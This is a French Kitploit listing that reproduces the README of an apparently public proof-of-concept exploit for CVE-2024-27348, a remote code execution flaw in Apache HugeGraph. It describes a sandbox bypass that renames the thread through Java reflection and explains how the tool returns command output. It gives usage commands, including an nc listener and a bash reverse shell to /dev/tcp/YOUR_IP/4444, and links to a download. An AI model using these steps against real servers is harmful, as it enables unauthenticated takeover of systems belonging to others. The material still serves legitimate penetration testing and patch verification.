Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-27348-HugeGraph-RCE — Exploit PoC avancé pour CVE-2024-27348, réalisant une RCE fiable dans Apache HugeGraph via un contournement de sandbox et une exécution de commande non aveugle. | Kitploit
Outils/GitHubGitHub/akelaqe/cve-2024-27348-hugegraph-rce
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed TeamingDéveloppement de Charges Utiles
GitHubakelaqe/cve-2024-27348-hugegraph-rce

CVE-2024-27348-HugeGraph-RCE

Exploit PoC avancé pour CVE-2024-27348, réalisant une RCE fiable dans Apache HugeGraph via un contournement de sandbox et une exécution de commande non aveugle.

Voir le dépôt
12il y a 5 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-27348 : Apache HugeGraph RCE (contournement avancé du sandbox)

Python 3.x Exploit CVE

Un exploit Proof of Concept (PoC) avancé et hautement fiable pour CVE-2024-27348 (exécution de code à distance sur le serveur Apache HugeGraph).

Contrairement à de nombreux PoC publics qui exécutent des commandes à l'aveugle ou échouent sur des charges utiles complexes en raison des limitations de Runtime.exec() de Java, ce script est conçu pour la fiabilité dans des scénarios réels de test d'intrusion.

⚠️ Avertissement

Uniquement à des fins éducatives et de tests autorisés. Cet outil est fourni aux chercheurs en sécurité, aux testeurs d'intrusion et aux administrateurs système pour vérifier la vulnérabilité dans des environnements autorisés. L'auteur n'est pas responsable de toute utilisation abusive ou des dommages causés par cet outil.

✨ Fonctionnalités et améliorations techniques

Cet exploit améliore les premiers PoC publics en traitant trois problèmes critiques :

  1. Contournement du sandbox HugeSecurityManager : Le sandbox HugeGraph bloque l'exécution si le thread appelant est nommé gremlin-server-exec-* ou task-worker-*. Cette charge utile utilise la réflexion Java pour renommer dynamiquement le thread d'exécution en BypassThread avant de déclencher la charge utile, contournant ainsi le gestionnaire de sécurité de manière transparente.
  2. Gestion des charges utiles complexes : Au lieu de Runtime.getRuntime().exec(String), qui casse les commandes bash complexes (comme les shells inversés) au niveau des espaces, cet exploit utilise ProcessBuilder avec une List<String> correctement formatée. Cela permet l'exécution sûre de charges utiles complexes avec des guillemets et des redirections.
  3. Lecture complète de la sortie (RCE non aveugle) : Le script lit l'InputStream du processus exécuté à l'aide d'un Scanner Java et renvoie la sortie réelle de la commande dans la réponse HTTP JSON. Vous voyez exactement ce que le serveur voit.

⚙️ Prérequis

  • Python 3.x
  • Bibliothèque requests

Installez les dépendances requises :

root@kitploit:~
pip3 install requests

🚀 Utilisation

root@kitploit:~
python3 exploit.py -u <TARGET_URL> -c <COMMAND>

Exemples

  1. Exécution de commande de base (lecture de la sortie) :
root@kitploit:~
python3 exploit.py -u [http://192.168.X.X:80](http://192.168.X.X:80) -c "whoami"
  1. Lancement d'un shell inversé : Comme la charge utile gère correctement les espaces et les guillemets, vous pouvez injecter directement un shell inversé bash standard sans avoir besoin de l'encoder en base64 ou de le préparer :
root@kitploit:~
# Sur votre machine d'attaque, démarrez un écouteur :
nc -lvnp 4444

# Exécutez l'exploit :
python3 exploit.py -u [http://192.168.X.X:80](http://192.168.X.X:80) -c "bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"

🔍 Détails de la vulnérabilité

Le serveur Apache HugeGraph expose un point de terminaison d'API Gremlin (/gremlin) qui permet aux utilisateurs de soumettre des scripts Groovy. En raison d'un sandbox insuffisant dans les versions antérieures au correctif, un attaquant non authentifié peut exécuter des commandes arbitraires du système d'exploitation via la réflexion Java.

Télécharger l’outil